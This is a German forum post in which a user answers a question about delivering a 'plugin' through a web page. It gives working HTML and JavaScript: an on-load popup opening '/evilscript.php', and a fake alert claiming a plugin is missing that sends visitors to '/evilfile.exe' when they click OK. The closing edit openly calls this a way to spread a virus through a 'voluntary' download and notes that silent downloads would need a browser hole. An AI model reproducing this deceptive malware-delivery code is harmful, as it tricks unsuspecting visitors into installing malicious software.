Plugin Download über HTML

[VeN0m]

Per HTML geht das natürlich nicht. HTML ist nur zum darstellen geeignet und hat keine Funktionen etc. Was Du suchst geht per JavaScript.

Aber warum kein Popup? Danach hatte inmate ja gefragt:

HTML-Code:

<html>
<head>
</head>
<body onLoad="window.open('/evilscript.php', 'Plugin',  'width=500, height=500, status=no, scrollbars=no, resizable=no');">
Inhalt der HTML-Seite
</body>
</html>

Öffnet evilscript.html in einem externen Fenster mit 500*500 Pixeln Größe.

Zu inmates vorletzten Post:

Code:

<script language="JavaScript" type="text/javascript">
<!--

var agree=confirm("Es fehlt ein Plugin auf Ihrem Rechner, welches zur Ausführung dieser Webseite benötigt wird. Installieren?");

if(agree) {

	window.location.href="/evilfile.exe";
	
} else {

	window.location.href="about:blank";
	
}

//-->
</script>

Es öffnet sich ein Alarmfenster, bei welchem der User mit "ok" bestätigen soll, dass er das Plugin installieren möchte. Wenn "ok" geklickt wird, wird der User auf die Datei (evilfile.exe) weitergeleitet, welche dann durch einen Downloaddialog heruntergeladen werden soll.

Das Script kannst Du auch in eine Funktion packen, die Du z.B. "checkplugin()" nennst. Dieses wird im Body ausgeführt:

HTML-Code:

<body onLoad="checkplugin()">

Bei "abbrechen" landet er auf einer weißen Seite (about:blank).

EDIT: Für einen Download im Hintergrund bräuchtest Du erstmal eine Sicherheitslücke im Browser. Da finde ich die Variante mit dem Virus per freiwilligen Download schon besser, da nicht jeder eine alte Version eines Browsers hat.